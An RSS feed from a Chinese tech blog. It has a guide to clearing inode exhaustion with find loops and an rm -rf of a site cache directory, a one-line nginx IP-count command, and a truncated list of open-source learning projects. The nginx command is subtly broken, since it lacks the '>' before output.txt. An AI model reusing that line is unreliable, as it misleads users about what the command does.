<?xml version="1.0" encoding="utf-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><title>天天博客</title><link>https://blog.ttcx.net/</link><description>官网博客</description><item><title>Inode可用不足10%，请前往文件管理清理不必要文件</title><link>https://blog.ttcx.net/post/inode10.html</link><description>&lt;p&gt;服务器提示“Inode可用不足10%”不是磁盘空间不足，而是文件数量达到上限。每个文件（无论大小）都消耗1个inode，inode用尽将导致无法创建任何新文件，即使磁盘还有空间。&lt;br/&gt;&lt;img src=&quot;https://blog.ttcx.net/upfiles/2025/1.ckLg95zvFwhByXdQjLW3CFPxaDUQ1GCK.gif&quot; width=&quot;442&quot; height=&quot;602&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;处理步骤：&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;strong&gt;先排查到底是哪个文件占用了大量磁盘&lt;/strong&gt;&lt;/span&gt;&lt;br/&gt;&lt;br/&gt;1、检查根目录下哪个文件夹占用磁盘，找到占用较多磁盘的文件夹，再单独进行排查。&lt;br/&gt;&lt;/p&gt;&lt;pre class=&quot;brush:bash;toolbar:false&quot;&gt;for i in /*;do echo $i; find $i | wc -l; done&lt;/pre&gt;&lt;p&gt;&lt;img src=&quot;https://blog.ttcx.net/upfiles/2025/2.mLume61HRgEcmo29WZNGGFYwcuoNjEY8.gif&quot; width=&quot;600&quot; height=&quot;801&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;2、按照上面的命令，检查占用磁盘最大的文件夹，以此类推&lt;/p&gt;&lt;pre class=&quot;brush:bash;toolbar:false&quot;&gt;for i in /www/*;do echo $i; find $i | wc -l; done&lt;/pre&gt;&lt;p&gt;&lt;br/&gt;3、最终确认文件夹，执行删除操作&lt;/p&gt;&lt;pre class=&quot;brush:bash;toolbar:false&quot;&gt;rm -rf /www/wwwroot/ttcx.net/cache&lt;/pre&gt;&lt;p&gt;&lt;img src=&quot;https://blog.ttcx.net/upfiles/2025/3.wcUgUw72f9aiN3P89UtmIqFUBZLorZKX.gif&quot; width=&quot;422&quot; height=&quot;486&quot;/&gt;&lt;/p&gt;</description><pubDate>Mon, 04 Aug 2025 15:16:08 +0800</pubDate></item><item><title>如何统计nginx日志里的IP访问量</title><link>https://blog.ttcx.net/post/%E5%A6%82%E4%BD%95%E7%BB%9F%E8%AE%A1nginx%E6%97%A5%E5%BF%97%E9%87%8C%E7%9A%84IP%E8%AE%BF%E9%97%AE%E9%87%8F.html</link><description>&lt;p&gt;awk &amp;#39;{print $1}&amp;#39; /www/wwwlogs/access_2025-07-15.log | sort | uniq -c | sort -nr output.txt&lt;/p&gt;</description><pubDate>Tue, 15 Jul 2025 09:20:52 +0800</pubDate></item><item><title>优秀的开源项目</title><link>https://blog.ttcx.net/post/kaiyuanxiangmu.html</link><description>&lt;h2 id=&quot;编程语言项目&quot;&gt;
    &lt;a href=&quot;?id=%e7%bc%96%e7%a8%8b%e8%af%ad%e8%a8%80%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;编程语言项目&quot;&gt;编程语言项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/geektutu/7days-golang&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;7days-golang&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/geektutu/7days-golang?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/geektutu/7days-golang?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/geektutu/7days-golang?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/geektutu/7days-golang?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/geektutu/7days-golang&quot; data-origin=&quot;https://img.shields.io/github/license/geektutu/7days-golang&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/geektutu/7days-golang&quot; data-origin=&quot;https://img.shields.io/github/last-commit/geektutu/7days-golang&quot; alt=&quot;&quot;/&gt; - 7天用 &lt;code&gt;Go&lt;/code&gt; 从零实现系列。&lt;a href=&quot;https://geektutu.com/post/gee.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bradtraversy/50projects50days&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;50projects50days&lt;/a&gt; - &amp;nbsp;50+ 个基于 &lt;code&gt;HTML/CSS&lt;/code&gt; 、&lt;code&gt;JavaScript&lt;/code&gt; 实现的&lt;strong&gt;小网页项目&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/unknwon/the-way-to-go_ZH_CN&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;the-way-to-go_ZH_CN&lt;/a&gt; - 《The Way to Go》中文译本，中文正式名《Go 入门指南》。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/biaochenxuying/blog&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;blog&lt;/a&gt; - 大&lt;strong&gt;前端技术&lt;/strong&gt;为主，读书笔记、随笔、理财为辅，做个终身学习者。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/singgel/JAVA&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JAVA&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 相关&lt;strong&gt;书籍合集&lt;/strong&gt;，《剑指Offer》、《编程珠玑》、《深入理解Java虚拟机：JVM高级特性与最佳实践》、《重构-改善既有代码的设计 &amp;nbsp;中文版》、《clean_code(中文完整版)》、《Java编程思想(第4版)》、《Java核心技术 卷I &amp;nbsp;(第8版)》、《Quartz_Job+Scheduling_Framework》。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhonghuasheng/Tutorial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Tutorial&lt;/a&gt; - 后端（&lt;code&gt;Java&lt;/code&gt; 、&lt;code&gt;Golang&lt;/code&gt;）全栈&lt;strong&gt;知识架构体系总结&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fuzhengwei/itstack-demo-design&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;itstack-demo-design&lt;/a&gt; - 《重学 Java 设计模式》是一本互联网真实案例实践书籍，以落地解决方案为核心，从实际业务中抽离出，交易、营销、秒杀、中间件、源码等22个真实场景，来学习设计模式的运用。&lt;a href=&quot;https://bugstack.cn/md/develop/design-pattern/2020-05-20-%E9%87%8D%E5%AD%A6Java%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F%E3%80%8A%E5%AE%9E%E6%88%98%E5%B7%A5%E5%8E%82%E6%96%B9%E6%B3%95%E6%A8%A1%E5%BC%8F%E3%80%8B.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/qiurunze123/threadandjuc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;threadandjuc&lt;/a&gt; - 高并发&lt;strong&gt;多线程&lt;/strong&gt;进阶。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/NotFound9/interviewGuide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;interviewGuide&lt;/a&gt; - 《后端技术总结》——包括 &lt;code&gt;Java&lt;/code&gt; 基础、&lt;code&gt;JVM&lt;/code&gt;、数据库、&lt;code&gt;MySQL&lt;/code&gt;、&lt;code&gt;Redis&lt;/code&gt;、计算机网络、算法、数据结构、操作系统、设计模式、系统设计、框架原理。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/krahets/hello-algo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hello-algo&lt;/a&gt; - 一本动画图解、能运行、可提问的&lt;strong&gt;数据结构与算法入门书&lt;/strong&gt;，支持 &lt;code&gt;Java&lt;/code&gt;, &lt;code&gt;C++&lt;/code&gt;, &lt;code&gt;Python&lt;/code&gt;, &lt;code&gt;Go&lt;/code&gt;, &lt;code&gt;JS&lt;/code&gt;, &lt;code&gt;TS&lt;/code&gt;, &lt;code&gt;C#&lt;/code&gt;, &lt;code&gt;Swift&lt;/code&gt;, &lt;code&gt;Zig&lt;/code&gt; 等语言。&lt;a href=&quot;https://www.hello-algo.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/EbookFoundation/free-programming-books&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;free-programming-books&lt;/a&gt; - 可免费获得的编程书籍。&lt;a href=&quot;https://ebookfoundation.github.io/free-programming-books/books/free-programming-books-zh.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xiaolincoder/CS-Base&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CS-Base&lt;/a&gt; - 图解计算机网络、操作系统、计算机组成、数据库。&lt;a href=&quot;https://xiaolincoding.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jackfrued/Python-100-Days&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Python-100-Days&lt;/a&gt; - &lt;code&gt;Python&lt;/code&gt; 100天从新手到大师。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kamranahmedse/developer-roadmap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;developer-roadmap&lt;/a&gt; - 开发者技术学习路线。&lt;a href=&quot;https://roadmap.sh/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jkchao/typescript-book-chinese&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;typescript-book-chinese&lt;/a&gt; - 《TypeScript Deep Dive》 中文版。&lt;a href=&quot;https://jkchao.github.io/typescript-book-chinese/#why&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/algorithm-visualizer/algorithm-visualizer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;algorithm-visualizer&lt;/a&gt; - 可视化算法的交互式在线平台。&lt;a href=&quot;https://algorithm-visualizer.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;span style=&quot;text-decoration:line-through;&quot;&gt;&lt;a href=&quot;https://github.com/itwanger/JavaBooks&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JavaBooks&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 程序员必读书单（超1000本PDF，附下载地址）。&lt;/span&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ByteByteGoHq/system-design-101&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;system-design-101&lt;/a&gt; - 图解系统设计。&lt;a href=&quot;https://blog.bytebytego.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TeamStuQ/skill-map&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;skill-map&lt;/a&gt; - 程序员技能图谱。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ruanyf/es6tutorial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;es6tutorial&lt;/a&gt; - 《ECMAScript 6入门》是一本开源的 &lt;code&gt;JavaScript&lt;/code&gt; 语言教程，全面介绍 ECMAScript 6 新增的语法特性。&lt;a href=&quot;https://es6.ruanyifeng.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/WindrunnerMax/EveryDay&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;EveryDay&lt;/a&gt; - 前端基础学习博客。&lt;a href=&quot;https://blog.touchczy.top/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/MichealWayne/books&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;books&lt;/a&gt; - 前端/设计相关的书籍（电子书）。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/PKUFlyingPig/cs-self-learning&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cs-self-learning&lt;/a&gt; - 计算机自学指南。&lt;a href=&quot;https://csdiy.wiki/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xcatliu/typescript-tutorial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;typescript-tutorial&lt;/a&gt; - &lt;code&gt;TypeScript&lt;/code&gt; 入门教程。&lt;a href=&quot;https://ts.xcatliu.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/milanm/DevOps-Roadmap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DevOps-Roadmap&lt;/a&gt; - &lt;code&gt;DevOps&lt;/code&gt; 学习路线和资源。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/taobao/nginx-book&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nginx-book&lt;/a&gt; - &lt;code&gt;Nginx&lt;/code&gt; 开发从入门到精通。&lt;a href=&quot;https://tengine.taobao.org/book/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/isno/theByteBook&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;theByteBook&lt;/a&gt; - 《深入架构原理与实践》。&lt;a href=&quot;https://www.thebyte.com.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/JacksonTian/fks&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;fks&lt;/a&gt; - 前端技能汇总。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Asabeneh/30-Days-Of-Python&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;30-Days-Of-Python&lt;/a&gt; - 30 天 &lt;code&gt;Python&lt;/code&gt; 编程学习挑战。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/d2l-ai/d2l-zh&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;d2l-zh&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/d2l-ai/d2l-zh?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/d2l-ai/d2l-zh?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/d2l-ai/d2l-zh?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/d2l-ai/d2l-zh?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/d2l-ai/d2l-zh&quot; data-origin=&quot;https://img.shields.io/github/license/d2l-ai/d2l-zh&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/d2l-ai/d2l-zh&quot; data-origin=&quot;https://img.shields.io/github/last-commit/d2l-ai/d2l-zh&quot; alt=&quot;&quot;/&gt; - 《动手学深度学习》：面向中文读者、能运行、可讨论。&lt;a href=&quot;http://zh.d2l.ai/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/johnlui/PPHC&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PPHC&lt;/a&gt; - 《高并发的哲学原理》开源图书。&lt;a href=&quot;https://pphc.lvwenhan.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hustcc/JS-Sorting-Algorithm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JS-Sorting-Algorithm&lt;/a&gt; - 一本关于排序算法的 &lt;code&gt;GitBook&lt;/code&gt; 在线书籍 《十大经典排序算法》，多语言实现。&lt;a href=&quot;https://sort.hust.cc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TheAlgorithms/Python&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Python&lt;/a&gt; - 用 &lt;code&gt;Python&lt;/code&gt; 实现所有算法。&lt;a href=&quot;https://thealgorithms.github.io/Python/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/liuxinyu95/AlgoXY&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;AlgoXY&lt;/a&gt; - 《算法新解》。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/datawhalechina/llm-cookbook&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;llm-cookbook&lt;/a&gt; - 面向开发者的 &lt;code&gt;LLM&lt;/code&gt; 入门教程。&lt;a href=&quot;https://datawhalechina.github.io/llm-cookbook/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;java-项目&quot;&gt;
    &lt;a href=&quot;?id=java-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;java-项目&quot;&gt;&lt;code&gt;Java&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dunwu/javacore&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;javacore&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 核心技术的经验总结。&lt;a href=&quot;https://dunwu.github.io/javacore/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/RedSpider1/concurrent&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;concurrent&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; &lt;strong&gt;多线程&lt;/strong&gt;系列文章。&lt;a href=&quot;http://concurrent.redspider.group/RedSpider.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/rbmonster/learning-note&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;learning-note&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; &lt;strong&gt;开发及面试&lt;/strong&gt;（个人面试、工作总结、资料收集）。&lt;a href=&quot;https://rbmonster.github.io/learning-note/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/qiurunze123/threadandjuc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;threadandjuc&lt;/a&gt; - 高并发&lt;strong&gt;多线程&lt;/strong&gt;进阶。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/CoderLeixiaoshuai/java-eight-part&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;java-eight-part&lt;/a&gt; - 『&lt;code&gt;Java&lt;/code&gt;八股文』面试套路，&lt;code&gt;Java&lt;/code&gt; 进阶学习。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hollischuang/toBeTopJavaer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;toBeTopJavaer&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 工程师成神之路。&lt;a href=&quot;https://hollischuang.gitee.io/tobetopjavaer/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/clxering/Effective-Java-3rd-edition-Chinese-English-bilingual&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Effective-Java-3rd-edition-Chinese-English-bilingual&lt;/a&gt; - &lt;code&gt;Effective Java&lt;/code&gt;（第3版）各章节的中英文学习。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/quarkusio/quarkus&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;quarkus&lt;/a&gt; - 一个为 &lt;code&gt;GraalVM&lt;/code&gt; 和 &lt;code&gt;HotSpot&lt;/code&gt; 定制的 &lt;code&gt;Kubernetes&lt;/code&gt; 原生 &lt;code&gt;Java&lt;/code&gt; 框架。&lt;a href=&quot;https://cn.quarkus.io/get-started/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/h2pl/JavaTutorial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JavaTutorial&lt;/a&gt; - 完整实用的 &lt;code&gt;Java&lt;/code&gt; 工程师&lt;strong&gt;学习指南&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dromara/Sa-Token&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Sa-Token&lt;/a&gt; - 史上功能最全的 &lt;code&gt;Java&lt;/code&gt; 权限认证框架！目前已集成——登录认证、权限认证、分布式 &lt;code&gt;Session&lt;/code&gt; 会话、微服务网关鉴权、单点登录、&lt;code&gt;OAuth2.0&lt;/code&gt;、踢人下线、&lt;code&gt;Redis&lt;/code&gt; 集成、前后台分离、记住我模式、模拟他人账号、临时身份切换、账号封禁、多账号认证体系、注解式鉴权、路由拦截式鉴权、花式 &lt;code&gt;token&lt;/code&gt; 生成、自动续签、同端互斥登录、会话治理、密码加密、&lt;code&gt;jwt&lt;/code&gt; 集成、&lt;code&gt;Spring&lt;/code&gt; 集成、&lt;code&gt;WebFlux&lt;/code&gt; 集成。&lt;a href=&quot;https://sa-token.cc/doc.html#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/noear/solon&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;solon&lt;/a&gt; - 一个高效的 &lt;code&gt;Java&lt;/code&gt; 应用开发框架，有自己接口标准规范的开放生态，组合不同的生态插件应对不同需求，方便定制，快速开发。&lt;a href=&quot;https://solon.noear.org/article/learn-start&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/shishan100/Java-Interview-Advanced&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Java-Interview-Advanced&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 进阶面试。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/tianai/tianai-captcha&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tianai-captcha&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 界的开源行为验证码（滑块验证码、点选验证码、行为验证码、旋转验证码， 滑动验证码）。&lt;a href=&quot;https://gitee.com/link?target=http%3A%2F%2Fcaptcha.tianai.cloud&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gzc426/Java-Interview&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Java-Interview&lt;/a&gt; - Java 面试。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/DozerMapper/dozer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dozer&lt;/a&gt; - 一个 &lt;code&gt;Java&lt;/code&gt; &lt;code&gt;Bean&lt;/code&gt; 到 &lt;code&gt;Java&lt;/code&gt; &lt;code&gt;Bean&lt;/code&gt; 映射器，可递归地将数据从一个对象复制到另一个对象。&lt;a href=&quot;https://dozermapper.github.io/gitbook/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/egzosn/pay-java-parent&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;pay-java-parent&lt;/a&gt; - 第三方支付对接全能&lt;strong&gt;支付&lt;/strong&gt; &lt;code&gt;Java&lt;/code&gt; 开发工具包。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
